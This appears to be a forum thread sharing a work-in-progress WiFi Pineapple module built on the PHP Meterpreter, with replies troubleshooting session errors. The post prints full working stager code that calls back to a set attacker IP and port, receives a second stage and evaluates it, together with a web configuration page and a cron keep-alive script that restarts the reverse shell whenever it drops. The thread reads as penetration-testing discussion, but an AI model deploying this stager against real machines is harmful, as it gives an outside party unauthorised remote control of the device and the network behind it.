
Mk4 Meterpreter Module Wip



So I've been working on a meterpreter module and it's 6:00 here so I figured I'd post my work-in-progress.

Here's a screenshot of it in action using armitage / cobalt strike (front-end for metasploit):


And here's a pic of the module WIP:


It's based off the PHP Meterpreter. To test it launch msf console and use the php/meterpreter_reverse_tcp payload.

Or from BT5 R2 start Armitage, hit Yes to start MSF and give it a minute, then from the tree in the top left double-click payload > php > meterpreter_reverse_tcp - set your IP and Port and launch.

Then on the pineapple from a shell issue "php tt.php" ensuring that the first few lines of tt.php reference said IP and port.

Here's the php meterpreter:

<?php

error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '172.16.42.42';
$port = 4445;
$ipf = AF_INET;

if (FALSE !== strpos($ip, ":")) {
	# ipv6 requires brackets around the address
	$ip = "[". $ip ."]";
	$ipf = AF_INET6;
}

# Use whichever socket API the PHP build exposes, in order of preference.
if (($f = 'stream_socket_client') && is_callable($f)) {
	$s = $f("tcp://{$ip}:{$port}");
	$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
	$s = $f($ip, $port);
	$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
	$s = $f($ipf, SOCK_STREAM, SOL_TCP);
	$res = @socket_connect($s, $ip, $port);
	if (!$res) { die(); }
	$s_type = 'socket';
} else {
	die('no socket funcs');
}
if (!$s) { die('no socket'); }

# The handler sends a 4-byte big-endian length first, then the stage itself.
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
	# We failed on the main socket.  There's no way to continue, so
	# bail
	die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];

# PHP variable names are case-sensitive: the buffer must be $b throughout
# (the original post had $B here, which would loop forever on an empty string).
$b = '';
while (strlen($b) < $len) {
	switch ($s_type) {
	case 'stream': $b .= fread($s, $len-strlen($b)); break;
	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
	}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();

?>

Just change IP and Port above to what you're using.

The biggest problem I've had with the module so far is getting it to fork properly. I've tried using "| at now" and even empty (not the greatest since it has a timeout). Even went as far as writing a meterpreter-keepalive.sh which would run by cron every minute. Here's the code:

meterpreter.php


<?php

if(isset($_GET['start'])) {
	echo "<pre>Starting Meterpreter</pre>";
	exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");

//	if (exec("ps aux | grep \"[s]tart-meterpreter.sh\"") == "") {
//		exec("empty -f -i /tmp/meterpreter.in -o /tmp/meterpreter.out -p /tmp/meterpreter.pid -L /tmp/meterpreter.log /www/pineapple/modules/meterpreter/start-meterpreter.sh");
//	} else {
//		echo "<pre><b>Meterpreter already running</b></pre>";
//	}
}

# Only the meterpreter script may be rewritten from this form. The filename
# arrives in a POST field, so reject anything else rather than letting the
# page overwrite arbitrary files on the pineapple.
$allowed = "/www/pineapple/modules/meterpreter/tt.php";
$filename = isset($_POST['filename']) ? $_POST['filename'] : "";
$newdata = isset($_POST['newdata']) ? $_POST['newdata'] : "";

if ($newdata != "") {
	if ($filename != $allowed) { die('Refusing to write to ' . htmlspecialchars($filename)); }
	# Strip the carriage returns the browser adds (ereg_replace(13, ...) did this
	# too, but ereg_* is deprecated and gone in later PHP versions).
	$newdata = str_replace("\r", "", $newdata);
	$fw = fopen($filename, 'w') or die('Could not open file!');
	$fb = fwrite($fw, stripslashes($newdata)) or die('Could not write to file');
	fclose($fw);
	$fileMessage = "Updated " . $filename . "<br /><br />";
} ?>


<html>
    <head>
    <title>Pineapple Control Center</title>
    <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
    <link rel="stylesheet" type="text/css" href="/pineapple/includes/styles.css" />
    <link rel="icon" href="/pineapple/favicon.ico" type="image/x-icon">
    <link rel="shortcut icon" href="/pineapple/favicon.ico" type="image/x-icon">
    </head>
<body>
<?php
include_once("/www/pineapple/includes/navbar.php");
?>
<br><br>
<center>
<table width="50%">
<tr><td>
<div class=news>
	<div class=moduleTitle><b>Configuration</b></div>
	<div class=moduleContent>
	Edit IP address and Port below to match that of your metasploit session.
	<?php
	$filename = "/www/pineapple/modules/meterpreter/tt.php";
	$fh = fopen($filename, "r") or die("Could not open file!");
	$data = fread($fh, filesize($filename)) or die("Could not read file!");
	fclose($fh);
	# $_SERVER keys are upper-case (PHP_SELF); escape the file contents so a
	# stray "</textarea>" in the script cannot break out of the form.
	$data = htmlspecialchars($data);
	echo "<form action='{$_SERVER['PHP_SELF']}' method='post'>
	<textarea name='newdata' rows='20' style='min-width:100%; background-color:black; color:white; border-style:dashed;'>$data</textarea>
	<input type='hidden' name='filename' value='/www/pineapple/modules/meterpreter/tt.php'>
	<br><center><input type='submit' value='Update Meterpreter Script'>
	</form>";
	?>

	</div>

	<br>
	<div class=moduleTitle>Meterpreter Configuration</div>
	<div class=moduleContent>
	This keep alive script will restart the Meterpreter session if it drops connection.


	</div>
</td></tr></table></center>
</body>
</html>

meterpreter-keepalive.sh

#!/bin/sh
# -------------------------------------------------
# Simple keep alive script for meterpreter sessions
# -------------------------------------------------
logger "Meterpreter: Keep-Alive Script Executed"
# pidof only matches program names, so "pidof php tt.php" would report any
# php process as the session; look for the script name in the process list.
if ! ps | grep -q '[t]t\.php'; then
	php /www/pineapple/modules/meterpreter/tt.php > /dev/null 2>&1 &
	logger "Meterpreter: Connection was down, restarted."
else
	logger "Meterpreter: Connection seems to be up."
fi

My code is rusty having taken a month or so off so I figured I'd post my work in progress. If started from a shell it works great. Just trying to pretty it up / package it up.

Lemme know what you think. I'm going to go look at the sky or something having nothing to do with computers for a few hours. Sure it'll come to me then...
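The stager above reads a 4-byte big-endian length (PHP's unpack("Nlen")) and then loops until it has that many bytes before eval(). As an added example, not code from the post or from Metasploit, this Python models both sides of that framing and the two edge cases the loop has to cope with: short reads and a stream that ends before the stage is complete. The stage body is a constructed placeholder string.

```python
import struct
from io import BytesIO

# Header format used by the stager: unsigned 32-bit, network (big-endian) order.
HEADER_FMT = ">I"
HEADER_LEN = struct.calcsize(HEADER_FMT)


def frame_stage(stage: bytes) -> bytes:
    """Handler side: prefix the stage body with its big-endian length."""
    return struct.pack(HEADER_FMT, len(stage)) + stage


def read_exact(stream, n: int, chunk: int = 3) -> bytes:
    """Read exactly n bytes, tolerating short reads. 'chunk' caps each read so
    the round trip below exercises the same accumulate-until-complete loop as
    the stager's while (strlen($b) < $len)."""
    buf = b""
    while len(buf) < n:
        part = stream.read(min(chunk, n - len(buf)))
        if not part:  # peer closed early: the stager's die() case
            raise EOFError("stream ended after %d of %d bytes" % (len(buf), n))
        buf += part
    return buf


def recv_stage(stream) -> bytes:
    """Stager side: parse the length header, then collect the full stage body."""
    (length,) = struct.unpack(HEADER_FMT, read_exact(stream, HEADER_LEN))
    return read_exact(stream, length)


def roundtrip(stage: bytes) -> bytes:
    """Frame a stage and parse it back through a fragmented in-memory stream."""
    return recv_stage(BytesIO(frame_stage(stage)))


def truncated_fails(stage: bytes) -> bool:
    """Drop the last byte of the frame: the reader must refuse a partial stage."""
    try:
        recv_stage(BytesIO(frame_stage(stage)[:-1]))
    except EOFError:
        return True
    return False


if __name__ == "__main__":
    sample = b"echo 'constructed sample stage, not a real one';"  # constructed input
    print(roundtrip(sample) == sample, truncated_fails(sample))
```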


Even more cool...is Darren now using a MAC?! Has Paul brought you over to the dark side (the cool side imho)?

Kidding aside, this looks like a great addition to the pineapple - I think bringing more and more metasploit into the fold only bolsters the pineapple's e-rep - a lot of folks in the community nowadays look on wifi hacks as almost passé. This kind of metasploit integration will lend credence to the fact that wifi is a great attack vector and very much worth not overlooking. Thanks Darren!

telot


Hey guys, Armitage & Cobalt Strike, why is one expensive and for windows only and the other one is free lol? They look like they do the exact same job, not to mention they look identical. Are there any major differences that justify spending the big bucks for Cobalt Strike?

Cheers - Anton.


So I got this working sort of... I just uploaded the meterpreter.php exploit into the www directory and named it m.php

So when I browse to m.php I get my evil-looking linux icon in Armitage and get my meterpreter session. However whenever I try to make a pivot or anything I get "loading stdapi. Try command again later". Anyone else have that issue?


I'm getting the same error. Thought it might be that metasploit just needs time to load stdapi, but looking at the console, the load is actually timing out. Am I missing something?

I did see that meterpreter comes back with a message as follows:

meterpreter> load stdapi
[*] Timed out waiting for command to complete

Lastly, the meterpreter.php file above contains the line:

exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");

but the code for this file doesn't appear to be on this page like the others (e.g. meterpreter-keepalive.sh).

Edited by blkik

Is there any update regarding what's been discussed above?


Here's what I've tried:

In armitage, when firing up the php/meterpreter/reverse_tcp attack, under advanced options I set AutoLoadStdApi = 0, so that I could load it myself and see what happens. Running the exploit worked just fine, got my pwnd Pineapple and meterpreter shell. So I typed "load stdapi" and it says "loading stdapi extension..."... and just sits there. Nothing happens. So I crack another shell and try it again, and it says "stdapi extension already loaded." Trying ping sweep or pivoting still yields the "loading stdapi. try command later" error.

I'm not too familiar with where the code is to dive in and try to figure this out, so any advice would be appreciated.

Thanks!
